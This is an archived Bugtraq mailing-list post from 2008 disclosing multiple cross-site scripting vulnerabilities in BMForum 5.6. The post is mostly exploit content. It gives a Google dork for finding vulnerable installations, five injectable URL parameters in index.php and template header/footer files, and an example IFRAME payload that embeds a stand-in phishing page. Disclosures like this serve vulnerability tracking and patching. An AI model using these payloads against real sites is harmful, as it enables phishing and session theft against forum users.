BMForum Remote 5.6 Miltiple XSS Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: BMForum Remote 5.6 Miltiple XSS Vulnerability
From: tan_prathan@xxxxxxxxxxx
Date: 22 May 2008 13:12:21 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

==========================================================
      BMForum Remote 5.6 Miltiple XSS Vulnerability             
==========================================================


AUTHOR : CWH Underground
DATE   : 22 May 2008
SITE   : www.citec.us


#####################################################
 APPLICATION : BMForum
 VERSION     : 5.6 (Lastest Version)
 VENDOR      : http://downloads.sourceforge.net/bmforum
#####################################################

DORK: "powered by BMForum"

---Exploit---

[-] http://[target]/[BBForum_path]/index.php?outpused=<XSS>
[-] 
http://[target]/[BBForum_path]/newtem/footer/bsd01footer.php?footer_copyright=<XSS>
[-] 
http://[target]/[BBForum_path]/newtem/footer/bsd01footer.php?verandproname=<XSS>
[-] http://[target]/[BBForum_path]/newtem/header/bsd01header.php?topads=<XSS>
[-] http://[target]/[BBForum_path]/newtem/header/bsd01header.php?myplugin=<XSS>

--- Note ---
 Very Dangerous for using 'IFRAME' TAG for Phishing Techniques
 
 Example: http://[target]/[BBForum_path]/index.php?outpused=<IFRAME 
src=http://phisherpage.com width="900" height="600">
                                                                                
                                                .

##################################################################
# Greetz: ZeQ3uL,BAD $ectors, Snapter, Conan, Win7dos, JabAv0C   #
##################################################################

Prev by Date: Exteen Blog XSS Remote Cookie Disclosure Exploit
Next by Date: /home/putnopvut/asa/AST-2008-007/AST-2008-007: AST-2008-007 Cryptographic keys generated by OpenSSL on Debian-based systems compromised
Previous by thread: Exteen Blog XSS Remote Cookie Disclosure Exploit
Next by thread: /home/putnopvut/asa/AST-2008-007/AST-2008-007: AST-2008-007 Cryptographic keys generated by OpenSSL on Debian-based systems compromised
Index(es):
- Date
- Thread